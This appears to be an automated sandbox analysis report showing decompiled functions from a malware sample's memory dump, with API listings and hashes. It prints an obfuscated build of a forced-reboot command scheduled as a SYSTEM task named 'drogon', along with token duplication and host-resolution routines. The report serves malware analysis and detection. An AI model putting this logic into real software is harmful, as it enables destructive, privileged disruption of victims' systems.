                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E28192() {
                                                                                                                                                              				short _v6;
                                                                                                                                                              				short _v8;
                                                                                                                                                              				short _v10;
                                                                                                                                                              				short _v12;
                                                                                                                                                              				short _v14;
                                                                                                                                                              				short _v16;
                                                                                                                                                              				short _v18;
                                                                                                                                                              				short _v20;
                                                                                                                                                              				short _v22;
                                                                                                                                                              				short _v24;
                                                                                                                                                              				short _v26;
                                                                                                                                                              				short _v28;
                                                                                                                                                              				short _v30;
                                                                                                                                                              				short _v32;
                                                                                                                                                              				short _v34;
                                                                                                                                                              				short _v36;
                                                                                                                                                              				short _v38;
                                                                                                                                                              				short _v40;
                                                                                                                                                              				short _v42;
                                                                                                                                                              				short _v44;
                                                                                                                                                              				short _v46;
                                                                                                                                                              				short _v48;
                                                                                                                                                              				short _v50;
                                                                                                                                                              				short _v52;
                                                                                                                                                              				struct _SYSTEMTIME _v68;
                                                                                                                                                              				short _v1628;
                                                                                                                                                              				short _v3676;
                                                                                                                                                              				void* _t48;
                                                                                                                                                              				signed int _t49;
                                                                                                                                                              				short _t56;
                                                                                                                                                              				short _t57;
                                                                                                                                                              				short _t58;
                                                                                                                                                              				short _t59;
                                                                                                                                                              				short _t60;
                                                                                                                                                              				short _t61;
                                                                                                                                                              				short _t62;
                                                                                                                                                              				short _t63;
                                                                                                                                                              				short _t64;
                                                                                                                                                              				short _t65;
                                                                                                                                                              				short _t66;
                                                                                                                                                              				short _t67;
                                                                                                                                                              				short _t68;
                                                                                                                                                              				short _t69;
                                                                                                                                                              				short _t70;
                                                                                                                                                              				short _t79;
                                                                                                                                                              				short _t80;
                                                                                                                                                              				signed int _t82;
                                                                                                                                                              				signed int _t84;
                                                                                                                                                              				short _t86;
                                                                                                                                                              				short _t87;
                                                                                                                                                              				short _t89;
                                                                                                                                                              				short _t90;
                                                                                                                                                              				short _t92;
                                                                                                                                                              				signed int _t98;
                                                                                                                                                              				signed int _t101;
                                                                                                                                                              
                                                                                                                                                              				_t80 = 0;
                                                                                                                                                              				if(( *0x4e37bc0 & 0x00000002) != 0) {
                                                                                                                                                              					GetLocalTime( &_v68);
                                                                                                                                                              					_t48 = E04E26477();
                                                                                                                                                              					if(_t48 < 0xf) {
                                                                                                                                                              						_t48 = 0xf;
                                                                                                                                                              					}
                                                                                                                                                              					_t49 = (_v68.wMinute & 0x0000ffff) + _t48 + 3;
                                                                                                                                                              					_t82 = 0x3c;
                                                                                                                                                              					_t101 = _t49 % _t82;
                                                                                                                                                              					_t84 = 0x18;
                                                                                                                                                              					_t98 = ((_v68.wHour & 0x0000ffff) + _t49 / _t82) % _t84;
                                                                                                                                                              					if(GetSystemDirectoryW( &_v1628, 0x30c) != 0) {
                                                                                                                                                              						_t56 = 0x73;
                                                                                                                                                              						_v52 = _t56;
                                                                                                                                                              						_t57 = 0x68;
                                                                                                                                                              						_v50 = _t57;
                                                                                                                                                              						_t58 = 0x75;
                                                                                                                                                              						_v48 = _t58;
                                                                                                                                                              						_t59 = 0x74;
                                                                                                                                                              						_v46 = _t59;
                                                                                                                                                              						_t60 = 0x64;
                                                                                                                                                              						_v44 = _t60;
                                                                                                                                                              						_t61 = 0x6f;
                                                                                                                                                              						_v42 = _t61;
                                                                                                                                                              						_t62 = 0x77;
                                                                                                                                                              						_v40 = _t62;
                                                                                                                                                              						_t63 = 0x6e;
                                                                                                                                                              						_v38 = _t63;
                                                                                                                                                              						_t64 = 0x2e;
                                                                                                                                                              						_v36 = _t64;
                                                                                                                                                              						_t65 = 0x65;
                                                                                                                                                              						_v34 = _t65;
                                                                                                                                                              						_t66 = 0x78;
                                                                                                                                                              						_v32 = _t66;
                                                                                                                                                              						_t67 = 0x65;
                                                                                                                                                              						_v30 = _t67;
                                                                                                                                                              						_t68 = 0x20;
                                                                                                                                                              						_v28 = _t68;
                                                                                                                                                              						_t86 = 0x2f;
                                                                                                                                                              						_v26 = _t86;
                                                                                                                                                              						_t87 = 0x72;
                                                                                                                                                              						_v24 = _t87;
                                                                                                                                                              						_v22 = _t68;
                                                                                                                                                              						_t89 = 0x2f;
                                                                                                                                                              						_v20 = _t89;
                                                                                                                                                              						_t90 = 0x74;
                                                                                                                                                              						_v18 = _t90;
                                                                                                                                                              						_v16 = _t68;
                                                                                                                                                              						_t92 = 0x30;
                                                                                                                                                              						_v12 = _t68;
                                                                                                                                                              						_t69 = 0x2f;
                                                                                                                                                              						_v10 = _t69;
                                                                                                                                                              						_t70 = 0x66;
                                                                                                                                                              						_v8 = _t70;
                                                                                                                                                              						_v6 = 0;
                                                                                                                                                              						_v14 = _t92;
                                                                                                                                                              						if(PathAppendW( &_v1628,  &_v52) != 0) {
                                                                                                                                                              							wsprintfW( &_v3676, L"schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00",  &_v1628, _t98, _t101);
                                                                                                                                                              							_t79 = E04E27FB7( &_v3676, 0); // executed
                                                                                                                                                              							_t80 = _t79;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t80;
                                                                                                                                                              			}


























































                                                                                                                                                              0x04e2819c
                                                                                                                                                              0x04e281a5
                                                                                                                                                              0x04e281af
                                                                                                                                                              0x04e281b5
                                                                                                                                                              0x04e281bd
                                                                                                                                                              0x04e281c1
                                                                                                                                                              0x04e281c1
                                                                                                                                                              0x04e281c8
                                                                                                                                                              0x04e281ce
                                                                                                                                                              0x04e281dd
                                                                                                                                                              0x04e281df
                                                                                                                                                              0x04e281f0
                                                                                                                                                              0x04e281fa
                                                                                                                                                              0x04e28202
                                                                                                                                                              0x04e28205
                                                                                                                                                              0x04e28209
                                                                                                                                                              0x04e2820c
                                                                                                                                                              0x04e28210
                                                                                                                                                              0x04e28213
                                                                                                                                                              0x04e28217
                                                                                                                                                              0x04e2821a
                                                                                                                                                              0x04e2821e
                                                                                                                                                              0x04e28221
                                                                                                                                                              0x04e28225
                                                                                                                                                              0x04e28228
                                                                                                                                                              0x04e2822c
                                                                                                                                                              0x04e2822f
                                                                                                                                                              0x04e28233
                                                                                                                                                              0x04e28236
                                                                                                                                                              0x04e2823a
                                                                                                                                                              0x04e2823d
                                                                                                                                                              0x04e28241
                                                                                                                                                              0x04e28244
                                                                                                                                                              0x04e28248
                                                                                                                                                              0x04e2824b
                                                                                                                                                              0x04e2824f
                                                                                                                                                              0x04e28252
                                                                                                                                                              0x04e28256
                                                                                                                                                              0x04e2825b
                                                                                                                                                              0x04e2825f
                                                                                                                                                              0x04e28262
                                                                                                                                                              0x04e28266
                                                                                                                                                              0x04e28269
                                                                                                                                                              0x04e2826f
                                                                                                                                                              0x04e28273
                                                                                                                                                              0x04e28276
                                                                                                                                                              0x04e2827a
                                                                                                                                                              0x04e2827d
                                                                                                                                                              0x04e28283
                                                                                                                                                              0x04e28287
                                                                                                                                                              0x04e2828a
                                                                                                                                                              0x04e2828e
                                                                                                                                                              0x04e2828f
                                                                                                                                                              0x04e28295
                                                                                                                                                              0x04e28296
                                                                                                                                                              0x04e2829c
                                                                                                                                                              0x04e282ab
                                                                                                                                                              0x04e282b7
                                                                                                                                                              0x04e282ce
                                                                                                                                                              0x04e282e0
                                                                                                                                                              0x04e282e5
                                                                                                                                                              0x04e282e5
                                                                                                                                                              0x04e282b7
                                                                                                                                                              0x04e282e8
                                                                                                                                                              0x04e282ed

                                                                                                                                                              APIs
                                                                                                                                                              • GetLocalTime.KERNEL32(?,00000000), ref: 04E281AF
                                                                                                                                                                • Part of subcall function 04E26477: GetTickCount.KERNEL32 ref: 04E26477
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04E281F2
                                                                                                                                                              • PathAppendW.SHLWAPI(?,?), ref: 04E282AF
                                                                                                                                                              • wsprintfW.USER32 ref: 04E282CE
                                                                                                                                                                • Part of subcall function 04E27FB7: wsprintfW.USER32 ref: 04E27FD6
                                                                                                                                                                • Part of subcall function 04E27FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04E27FFA
                                                                                                                                                                • Part of subcall function 04E27FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04E2800C
                                                                                                                                                                • Part of subcall function 04E27FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04E28022
                                                                                                                                                                • Part of subcall function 04E27FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04E28069
                                                                                                                                                                • Part of subcall function 04E27FB7: Sleep.KERNELBASE(00000000), ref: 04E2807F
                                                                                                                                                              Strings
                                                                                                                                                              • schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00, xrefs: 04E282C8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectorySystemwsprintf$AppendCountCreateEnvironmentLocalPathProcessSleepTickTimeVariablelstrcat
                                                                                                                                                              • String ID: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
                                                                                                                                                              • API String ID: 2586884543-3727968613
                                                                                                                                                              • Opcode ID: 4b79ff655b4198c5dc0fd463706e55215bda88d203f57c2587318c106d3e84b1
                                                                                                                                                              • Instruction ID: 3dd2caa29195a8701e4f0c5065469e506783aa40b9933ec0c1556b8690712ec1
                                                                                                                                                              • Opcode Fuzzy Hash: 4b79ff655b4198c5dc0fd463706e55215bda88d203f57c2587318c106d3e84b1
                                                                                                                                                              • Instruction Fuzzy Hash: CF41D522A58348A9FB10DBE0EC16BFE73B5EF44B10F10551BE604FB1D0E6B65A80C359
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                              			E04E2A016(void* _a7312, void* _a7316, void* _a7324) {
                                                                                                                                                              				short _v36;
                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                              				void* _v44;
                                                                                                                                                              				void* _v48;
                                                                                                                                                              				char _v64;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				int _t21;
                                                                                                                                                              				HANDLE* _t23;
                                                                                                                                                              				HANDLE* _t51;
                                                                                                                                                              
                                                                                                                                                              				_v48 = 0;
                                                                                                                                                              				_v44 = 0;
                                                                                                                                                              				_t21 = OpenThreadToken(GetCurrentThread(), 0xb, 1,  &_v48);
                                                                                                                                                              				_t57 = _t21;
                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                              					DuplicateTokenEx(_v48, 0x2000000, 0, 2, 2,  &_v44);
                                                                                                                                                              				}
                                                                                                                                                              				_v40 =  *0x4e37bb8;
                                                                                                                                                              				_t23 = E04E26C5F(0x24, E04E26AA8, 0, 0xffff); // executed
                                                                                                                                                              				_t51 = _t23;
                                                                                                                                                              				E04E275D8(_t51, 0); // executed
                                                                                                                                                              				E04E276F2(_t51); // executed
                                                                                                                                                              				E04E26CC8(_t51);
                                                                                                                                                              				_t45 = _t51;
                                                                                                                                                              				_t43 = E04E26B0E(_t51, _t57,  &_v64);
                                                                                                                                                              				if(_t28 != 0) {
                                                                                                                                                              					do {
                                                                                                                                                              						if(E04E29534( &_v36, 0, 0, 0) != 0) {
                                                                                                                                                              							E04E26B5F( &_v36, _t51, _t43);
                                                                                                                                                              							_t45 =  &_v44;
                                                                                                                                                              							E04E26B5F( &_v44, _v48, 0);
                                                                                                                                                              						}
                                                                                                                                                              						_v36 = 0;
                                                                                                                                                              					} while (E04E26AD0(_t45,  &_v36) != 0);
                                                                                                                                                              					E04E26B46(_t43);
                                                                                                                                                              				}
                                                                                                                                                              				if(_v48 != 0) {
                                                                                                                                                              					CloseHandle(_v48);
                                                                                                                                                              					_v48 = 0;
                                                                                                                                                              				}
                                                                                                                                                              				if(_v44 != 0) {
                                                                                                                                                              					CloseHandle(_v44);
                                                                                                                                                              				}
                                                                                                                                                              				return 0;
                                                                                                                                                              			}












                                                                                                                                                              0x04e2a02d
                                                                                                                                                              0x04e2a031
                                                                                                                                                              0x04e2a03c
                                                                                                                                                              0x04e2a042
                                                                                                                                                              0x04e2a044
                                                                                                                                                              0x04e2a059
                                                                                                                                                              0x04e2a059
                                                                                                                                                              0x04e2a071
                                                                                                                                                              0x04e2a075
                                                                                                                                                              0x04e2a07a
                                                                                                                                                              0x04e2a07e
                                                                                                                                                              0x04e2a084
                                                                                                                                                              0x04e2a089
                                                                                                                                                              0x04e2a093
                                                                                                                                                              0x04e2a09a
                                                                                                                                                              0x04e2a09e
                                                                                                                                                              0x04e2a0a0
                                                                                                                                                              0x04e2a0af
                                                                                                                                                              0x04e2a0b7
                                                                                                                                                              0x04e2a0c1
                                                                                                                                                              0x04e2a0c5
                                                                                                                                                              0x04e2a0c5
                                                                                                                                                              0x04e2a0cc
                                                                                                                                                              0x04e2a0db
                                                                                                                                                              0x04e2a0e0
                                                                                                                                                              0x04e2a0e0
                                                                                                                                                              0x04e2a0ef
                                                                                                                                                              0x04e2a0f5
                                                                                                                                                              0x04e2a0f7
                                                                                                                                                              0x04e2a0f7
                                                                                                                                                              0x04e2a0ff
                                                                                                                                                              0x04e2a105
                                                                                                                                                              0x04e2a105
                                                                                                                                                              0x04e2a10f

                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 04E2A035
                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04E2A1D0,00000000), ref: 04E2A03C
                                                                                                                                                              • DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 04E2A059
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000024,Function_00006AA8,00000000,0000FFFF), ref: 04E2A0F5
                                                                                                                                                              • CloseHandle.KERNEL32(0000FFFF,?,00000000,00000000,00000000,00000024,Function_00006AA8,00000000,0000FFFF), ref: 04E2A105
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandleThreadToken$CurrentDuplicateOpen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3602278934-0
                                                                                                                                                              • Opcode ID: 7b7bc7db3d7f8ec4b463623fee3923ac3d90686bcdb83caa98ab79406f83cde1
                                                                                                                                                              • Instruction ID: e25dd690b0b1632864fadd9d7be09b24603b68b2bf05f89db41806f73a6f83cc
                                                                                                                                                              • Opcode Fuzzy Hash: 7b7bc7db3d7f8ec4b463623fee3923ac3d90686bcdb83caa98ab79406f83cde1
                                                                                                                                                              • Instruction Fuzzy Hash: 7F21A071504321ABE220EF729E49E5FBBECEFC4718F005A29B544D2051EA74E904CBA2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E04E29376(short* _a4, short* _a8) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				char _v284;
                                                                                                                                                              				char _v548;
                                                                                                                                                              				char _v1068;
                                                                                                                                                              				intOrPtr _t19;
                                                                                                                                                              				short* _t20;
                                                                                                                                                              				char* _t25;
                                                                                                                                                              				void* _t31;
                                                                                                                                                              
                                                                                                                                                              				_v16 =  *0x4e37b94;
                                                                                                                                                              				_t19 =  *0x4e33984; // 0x11c5380
                                                                                                                                                              				_v12 = _t19;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t20 = PathFindFileNameW(0x4e37bc8);
                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                              					_t35 =  &_v548;
                                                                                                                                                              					WideCharToMultiByte(0xfde9, 0, _t20, 0xffffffff,  &_v548, 0x104, 0, 0);
                                                                                                                                                              					WideCharToMultiByte(0xfde9, 0, _a4, 0xffffffff,  &_v284, 0x104, 0, 0);
                                                                                                                                                              					_t25 =  &_v284;
                                                                                                                                                              					__imp__#11(_t25);
                                                                                                                                                              					if(_t25 != 0xffffffff || E04E29332( &_v284,  &_v284) != 0) {
                                                                                                                                                              						WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v1068, 0x208, 0, 0);
                                                                                                                                                              						_t31 = E04E25337(_t35,  &_v284,  &_v1068,  &_v548, _v12, _v16); // executed
                                                                                                                                                              						if(_t31 == 0) {
                                                                                                                                                              							_v8 = 1;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _v8;
                                                                                                                                                              			}













                                                                                                                                                              0x04e29387
                                                                                                                                                              0x04e2938a
                                                                                                                                                              0x04e29396
                                                                                                                                                              0x04e29399
                                                                                                                                                              0x04e2939c
                                                                                                                                                              0x04e293a4
                                                                                                                                                              0x04e293b7
                                                                                                                                                              0x04e293c8
                                                                                                                                                              0x04e293df
                                                                                                                                                              0x04e293e1
                                                                                                                                                              0x04e293e8
                                                                                                                                                              0x04e293f1
                                                                                                                                                              0x04e29418
                                                                                                                                                              0x04e29435
                                                                                                                                                              0x04e2943c
                                                                                                                                                              0x04e2943e
                                                                                                                                                              0x04e2943e
                                                                                                                                                              0x04e2943c
                                                                                                                                                              0x04e293f1
                                                                                                                                                              0x04e2944c

                                                                                                                                                              APIs
                                                                                                                                                              • PathFindFileNameW.SHLWAPI(04E37BC8,?,00000000,00000000), ref: 04E2939C
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 04E293C8
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 04E293DF
                                                                                                                                                              • inet_addr.WS2_32(?), ref: 04E293E8
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000208,00000000,00000000), ref: 04E29418
                                                                                                                                                                • Part of subcall function 04E29332: gethostbyname.WS2_32(04E293FF), ref: 04E2933B
                                                                                                                                                                • Part of subcall function 04E29332: wsprintfA.USER32 ref: 04E29365
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$FileFindNamePathgethostbynameinet_addrwsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3160354238-0
                                                                                                                                                              • Opcode ID: 1c0c6cfae21b1a55a5d867e201f932fa4fe8a679d6a477bd03d33a7365f42292
                                                                                                                                                              • Instruction ID: 93e5c0c39947ce3cfdfc004d50e5edd6e19458f1a07e3e82b82657678a42b750
                                                                                                                                                              • Opcode Fuzzy Hash: 1c0c6cfae21b1a55a5d867e201f932fa4fe8a679d6a477bd03d33a7365f42292
                                                                                                                                                              • Instruction Fuzzy Hash: 79212CB2A0011CBEEB10DA95DDC4DEF7BBDEB04368F5052A5F624E2180DB74AE459B60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E26C5F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				signed int _t14;
                                                                                                                                                              				void* _t17;
                                                                                                                                                              				struct _CRITICAL_SECTION* _t24;
                                                                                                                                                              
                                                                                                                                                              				_t24 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                                                              				if(_t24 != 0) {
                                                                                                                                                              					InitializeCriticalSection(_t24);
                                                                                                                                                              					_t14 = _a16;
                                                                                                                                                              					 *(_t24 + 0x20) = _t14;
                                                                                                                                                              					 *((intOrPtr*)(_t24 + 0x1c)) = _a4;
                                                                                                                                                              					 *((intOrPtr*)(_t24 + 0x2c)) = _a8;
                                                                                                                                                              					_t22 = _a12;
                                                                                                                                                              					 *((intOrPtr*)(_t24 + 0x24)) = 0;
                                                                                                                                                              					 *((intOrPtr*)(_t24 + 0x30)) = _a12;
                                                                                                                                                              					_t17 = RtlAllocateHeap(GetProcessHeap(), 8, _t14 << 2); // executed
                                                                                                                                                              					 *(_t24 + 0x18) = _t17;
                                                                                                                                                              					if(_t17 == 0) {
                                                                                                                                                              						E04E26BD1(_t22, _t24);
                                                                                                                                                              						_t24 = 0;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t24;
                                                                                                                                                              			}







                                                                                                                                                              0x04e26c7a
                                                                                                                                                              0x04e26c7e
                                                                                                                                                              0x04e26c81
                                                                                                                                                              0x04e26c87
                                                                                                                                                              0x04e26c8d
                                                                                                                                                              0x04e26c90
                                                                                                                                                              0x04e26c99
                                                                                                                                                              0x04e26c9c
                                                                                                                                                              0x04e26ca2
                                                                                                                                                              0x04e26ca9
                                                                                                                                                              0x04e26caf
                                                                                                                                                              0x04e26cb1
                                                                                                                                                              0x04e26cb6
                                                                                                                                                              0x04e26cb8
                                                                                                                                                              0x04e26cbd
                                                                                                                                                              0x04e26cbd
                                                                                                                                                              0x04e26cb6
                                                                                                                                                              0x04e26cc5

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000034,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C6F
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C78
                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C81
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26CAC
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26CAF
                                                                                                                                                                • Part of subcall function 04E26BD1: GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C29
                                                                                                                                                                • Part of subcall function 04E26BD1: HeapFree.KERNEL32(00000000,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C2C
                                                                                                                                                                • Part of subcall function 04E26BD1: GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C39
                                                                                                                                                                • Part of subcall function 04E26BD1: HeapFree.KERNEL32(00000000,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C3C
                                                                                                                                                                • Part of subcall function 04E26BD1: GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C4E
                                                                                                                                                                • Part of subcall function 04E26BD1: HeapFree.KERNEL32(00000000,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C51
                                                                                                                                                                • Part of subcall function 04E26BD1: GetProcessHeap.KERNEL32(00000000,00000000,74654F20,77D74620,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C56
                                                                                                                                                                • Part of subcall function 04E26BD1: HeapFree.KERNEL32(00000000,?,?,04E26CBD,?,?,00000000,?,04E27A55,00000024,04E26AA8,00000000,0000FFFF), ref: 04E26C59
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$Free$AllocAllocateCriticalInitializeSection
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1652351593-0
                                                                                                                                                              • Opcode ID: c5972466e60652e1898da1f0329454bc5095681f63a623c08207408c565405e3
                                                                                                                                                              • Instruction ID: 74fb37547b8a3358ba3fa06656a42f079f69d893ffc8092f5e0c9fda8f9c7c0c
                                                                                                                                                              • Opcode Fuzzy Hash: c5972466e60652e1898da1f0329454bc5095681f63a623c08207408c565405e3
                                                                                                                                                              • Instruction Fuzzy Hash: 01014B716007246BD320DFAADD40E5BB7E8FF48754F00461AEA49D7740DA71E8008BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E2A420(void* __ecx, void _a4) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				void* _t9;
                                                                                                                                                              				void* _t20;
                                                                                                                                                              
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t20 = HeapAlloc(GetProcessHeap(), 8, 4);
                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                              					 *_t20 = _a4; // executed
                                                                                                                                                              					_t9 = CreateThread(0, 0, E04E2A333, _t20, 0, 0); // executed
                                                                                                                                                              					_v8 = _t9;
                                                                                                                                                              					if(_t9 == 0) {
                                                                                                                                                              						HeapFree(GetProcessHeap(), 0, _t20);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _v8;
                                                                                                                                                              			}






                                                                                                                                                              0x04e2a433
                                                                                                                                                              0x04e2a43f
                                                                                                                                                              0x04e2a443
                                                                                                                                                              0x04e2a452
                                                                                                                                                              0x04e2a454
                                                                                                                                                              0x04e2a45a
                                                                                                                                                              0x04e2a45f
                                                                                                                                                              0x04e2a466
                                                                                                                                                              0x04e2a466
                                                                                                                                                              0x04e2a45f
                                                                                                                                                              0x04e2a473

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000004,746543E0,?,00000000,?,?,04E27B89,000000FF), ref: 04E2A436
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,04E27B89,000000FF), ref: 04E2A439
                                                                                                                                                              • CreateThread.KERNELBASE ref: 04E2A454
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,04E27B89,000000FF), ref: 04E2A463
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,04E27B89,000000FF), ref: 04E2A466
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
